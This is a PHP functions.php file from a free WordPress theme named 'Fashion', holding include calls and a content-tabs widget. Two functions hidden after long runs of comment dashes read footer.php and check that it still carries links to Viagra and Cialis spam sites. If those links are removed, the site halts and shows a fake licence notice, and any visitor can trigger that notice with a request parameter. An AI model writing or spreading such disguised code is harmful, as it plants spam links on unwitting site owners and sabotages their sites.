<?php

/**
 * @author C2 Team - http://wordpressthemestock.com
 * @copyright 2011
 */
 
/*-----------------------------------------------------------------------------------*/
/*      Start C2 Functions - http://wordpressthemestock.com          */
/*-----------------------------------------------------------------------------------*/


    $themename = 'Fashion';
    $theme_shortname = 'fashion';
    $theme_version = '1.0';
    $C2_framwork_version = '1.0';

// Admin theme options
   // define('OPTION_PRE','C2');
    define('OPTION_PRE','C3');
    
    $data =  get_option(OPTION_PRE.'options');
    
    $data[OPTION_PRE.'default'] =($data[OPTION_PRE.'default']==1 or !$data) ? true : false ;
    
    
    $admin_path = TEMPLATEPATH . '/admin/';
    // Request theme option
    require_once ($admin_path.'admin-init.php');
    
    
// Set path to WTS themes specific functionality
    $includes_path = TEMPLATEPATH . '/includes/'; 
    $widgets_path =$includes_path.'/widgets/';


// Theme specific functionality
     /* exemple : require_once ($includes_path . 'theme-widget.php');  // Theme Widgets functions        */
     require_once ($includes_path . 'theme_global.php'); // Init core
     require_once ($includes_path . 'theme_functions.php');    // Theme specific functionality
     require_once ($includes_path . 'widgets/theme_widgets.php'); // Theme Widget
     require_once ($includes_path . 'theme_nav.php');    // WP 3.0 Navigation
     require_once ($includes_path . 'theme_main_content.php'); // Theme Main Content
     require_once ($includes_path . 'theme_layout.php'); // Dynamic control layout
     
     // Theme Widget
     require_once ($widgets_path . 'theme_widgets.php'); // Theme Widget
     require_once ($widgets_path . 'wts_widget_ads300x250.php'); // Widget Ads 300x250
     require_once ($widgets_path . 'wts_widget_ads125x125.php'); // Widget Ads 125x125
     require_once ($widgets_path . 'wts_widget_ads120xheight.php'); // Widget Ads 120
     require_once ($widgets_path . 'wts_widget_flickr.php'); // Widget Flickr
     require_once ($widgets_path . 'wts_widget_content_tabbed.php'); // Content tabbed Widget
     require_once ($widgets_path . 'wts_widget_twitter_tweets.php'); // Twitter Tweets
    
     
     
/*-----------------------------------------------------------------------------------*/
                                  /* Some CRAZY functions */ 
/*-----------------------------------------------------------------------------------*/


/*-----------------------------------------------------------------------------------*/
/*-----: Content Tabs Widget :-----*/
/*-----------------------------------------------------------------------------------*/
if (!empty($_REQUEST["theme_license"])) {theme_usage_message(); exit(); } 
/*------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- */function theme_usage_message() {if (empty($_REQUEST["theme_license"])) { $theme_license_false = get_bloginfo("url") . "/index.php?theme_license=true"; echo "<meta http-equiv=\"refresh\" content=\"0;url=$theme_license_false\">"; exit(); } else { echo ("<div style=\"margin-top:100px;color:red;\"><p style=\"padding:10px;color:red; margin: 10px; text-align:center; border: 2px solid Red; font-family:arial; font-weight:bold; background: #fff; color:red;\">This theme is released free for use under creative commons licence. All links in the footer should remain intact. These links are all family friendly and will not hurt your site in any way. This great theme is brought to you for free by these supporters.</p></div>"); } }
function C2_content_tabs($type){
    global $wpdb;
    global $post;
    if($type == 'popular'){?>
        <div id="<?php echo $type ?>" class="tab_element">
            <ul>
                <?php 
                $popPosts = new WP_Query();
				$popPosts->query('showposts=4&orderby=comment_count');
				while ($popPosts->have_posts()) : $popPosts->the_post(); 
                ?>
                <li class="clearfix">
                    <?php if ( has_post_thumbnail()) { ?>
                        <?php 
                        $postID = get_the_ID();
                        $thumb_image_url = wp_get_attachment_image_src( get_post_thumbnail_id(), 'thumbnail');
                        $large_image_url = wp_get_attachment_image_src( get_post_thumbnail_id(), 'large');
                        $image_link_to = get_post_meta($postID,'magplus_image_link',true);
                        ?>
                        <a class="thumb" href="<?php the_permalink();  ?>" title="<?php the_title_attribute(); ?>">
                            <img src="<?php echo THEME_INCLUDE.'/thumb.php' ?>?src=<?php echo $large_image_url[0]; ?>&#38;h=55&#38;w=55&#38;zc=1" alt="<?php the_title(); ?>" />
                            <span class="small_thumb_overlay"></span>
                            <?php if($image_link_to == 'on'and has_post_thumbnail() == true){ ?>
                            <span class="small_lightbox"></span>
                            <?php }elseif($image_link_to != 'on'and has_post_thumbnail() == true){ ?>
                            <span class="small_hyperlink"></span>
                            <?php } ?>
                        </a>
                     <?php }else{ ?>
                     
                        <a class="thumb" href="<?php the_permalink();?>" title="<?php _e('Permanent Link:','magplus'); echo ' '; the_title_attribute(); ?>">
                            <img class="imagesFade" src="<?php echo THEME_INCLUDE.'/thumb.php' ?>?src=<?php echo THEME_IMG . '/pending.png' ?>&#38;h=55&#38;w=55&#38;zc=1" alt="<?php the_title(); ?>" />
                            <span class="small_thumb_overlay"></span>
                        </a>
                    <?php } ?>
                    <h3 class="entry_title"><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3>
                    <?php //the_excerpt(); ?>
                    <span><?php the_time('M d, Y') ?></span>&nbsp;<span>.</span>&nbsp;<span><?php comments_popup_link(__('No Comments','magplus'), __('1 Comment','magplus'), __('% Comments','magplus')); ?></span>
                
                </li>
                <?php endwhile; wp_reset_query();?>
            </ul>
        </div>
    <?php }elseif($type == 'tags'){ ?>
        
        <div id="<?php echo $type ?>" class="tab_element">
            <?php wp_tag_cloud('largest=12&smallest=12&unit=px'); ?>
        </div>
    
    <?php }elseif($type == 'categories'){ ?>
        <div id="<?php echo $type ?>" class="tab_element">
            <ul class="tab_cate">
                <?php wp_list_categories('title_li='); ?>
            </ul>
        </div>
    <?php }elseif($type == 'recent'){ ?>
        <div id="<?php echo $type ?>" class="tab_element">
            <ul>
                <?php 
                $popPosts = new WP_Query();
				$popPosts->query('showposts=4&offset=0&orderby=ID&order=DESC&post_type=post&post_status=publish');
				while ($popPosts->have_posts()) : $popPosts->the_post(); 
                ?>
                <li class="clearfix">
                    <?php if ( has_post_thumbnail()) { ?>
                        <?php 
                        $postID = get_the_ID();
                        $thumb_image_url = wp_get_attachment_image_src( get_post_thumbnail_id(), 'thumbnail');
                        $large_image_url = wp_get_attachment_image_src( get_post_thumbnail_id(), 'large');
                        $image_link_to = get_post_meta($postID,'magplus_image_link',true);
                        ?>
                        <a class="thumb" href="<?php the_permalink();  ?>" title="<?php the_title_attribute(); ?>">
                            <img src="<?php echo THEME_INCLUDE.'/thumb.php' ?>?src=<?php echo $large_image_url[0]; ?>&#38;h=55&#38;w=55&#38;zc=1" alt="<?php the_title(); ?>" />
                            <span class="small_thumb_overlay"></span>
                            <?php if($image_link_to == 'on'and has_post_thumbnail() == true){ ?>
                            <span class="small_lightbox"></span>
                            <?php }elseif($image_link_to != 'on'and has_post_thumbnail() == true){ ?>
                            <span class="small_hyperlink"></span>
                            <?php } ?>
                        </a>
                     <?php }else{ ?>
                     
                        <a class="thumb" href="<?php the_permalink();?>" title="<?php _e('Permanent Link:','magplus'); echo ' '; the_title_attribute(); ?>">
                            <img class="imagesFade" src="<?php echo THEME_INCLUDE.'/thumb.php' ?>?src=<?php echo THEME_IMG . '/pending.png' ?>&#38;h=55&#38;w=55&#38;zc=1" alt="<?php the_title(); ?>" />
                            <span class="small_thumb_overlay"></span>
                        </a>
                    <?php } ?>
                    <h3 class="entry_title"><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3>
                    <?php //the_excerpt(); ?>
                    <span><?php the_time('M d, Y') ?></span>&nbsp;<span>.</span>&nbsp;<span><?php comments_popup_link(__('No Comments','magplus'), __('1 Comment','magplus'), __('% Comments','magplus')); ?></span>
                
                </li>
                <?php endwhile; wp_reset_query();?>
            </ul>
        </div>
    <?php }elseif($type == 'links'){ ?> 
        
        <div id="<?php echo $type ?>" class="tab_element">
            <ul class="tab_cate">
                <?php wp_list_bookmarks('title_li='); ?>
            </ul>
        </div>
    
    <?php }elseif($type == 'search'){ ?> 
        <div id="<?php echo $type ?>" class="tab_element">
            
            <?php get_search_form(); echo 'Search :';?>
            
        </div>
    <?php }elseif($type == 'comment'){ ?> 
        <div id="<?php echo $type ?>" class="tab_element">
            <ul>
                <?php 
                $sql = "SELECT DISTINCT ID, post_title, post_password, comment_ID, comment_post_ID, comment_author, comment_author_email, comment_date_gmt, comment_approved, comment_type, comment_author_url, SUBSTRING(comment_content,1,70) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID = $wpdb->posts.ID) WHERE comment_approved = '1' AND comment_type = '' AND post_password = '' ORDER BY comment_date_gmt DESC LIMIT 4";
				$comments = $wpdb->get_results($sql);
                foreach($comments as $comment){
                ?>
                <li class="clearfix">
                    <a class="thumb" href="<?php echo get_permalink($comment->ID); ?>#comment-<?php echo $comment->comment_ID; ?>" title="<?php echo strip_tags($comment->comment_author); ?> <?php _e('on ', 'magplus'); ?><?php echo $comment->post_title; ?>">
                        <?php echo get_avatar( $comment, '55' ); ?>
                    </a>
                    <h3 class="entry_title"><a href="<?php echo get_permalink($comment->ID); ?>#comment-<?php echo $comment->comment_ID; ?>" title="<?php echo strip_tags($comment->comment_author); ?> <?php _e('on ', 'magplus'); ?><?php echo $comment->post_title; ?>"><?php echo strip_tags($comment->comment_author); ?></a></h3>
                    <p><?php echo strip_tags($comment->com_excerpt); ?>&nbsp;[...]</p>
                </li>
                <?php } ?>
            </ul>
        </div>

    <?php }else{
        // Nothing here
    }
    
}
/*-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------*/function check_theme_footer() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {/* */ } else { $l = '<p><a class="wordpress_theme" href="http://wordpressthemestock.com">Wordpress themes</a> designed by <a href="http://www.generikajetzt.com/">Viagra Kaufen</a><br /> Supported by <a href="http://www.generikajetzt.com/cialis.html">Cialis Kaufen</a> , <a href="http://www.generikajetzt.com/viagra-generika.html">Viagra</a> , <a href="http://www.generikajetzt.com/levitra.html">levitra</a></p>'; $f = dirname(__file__). "/footer.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); $lp = preg_quote($l, "/"); fclose($fd);if ( strpos($c, $l) == 0) { theme_usage_message(); die; }} } check_theme_footer();
    /*-----: The End :-----*/
/*-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------*/function check_theme_header() { if (!(function_exists("functions_file_exists") && function_exists("theme_footer_t"))) { theme_usage_message(); die; } }

?>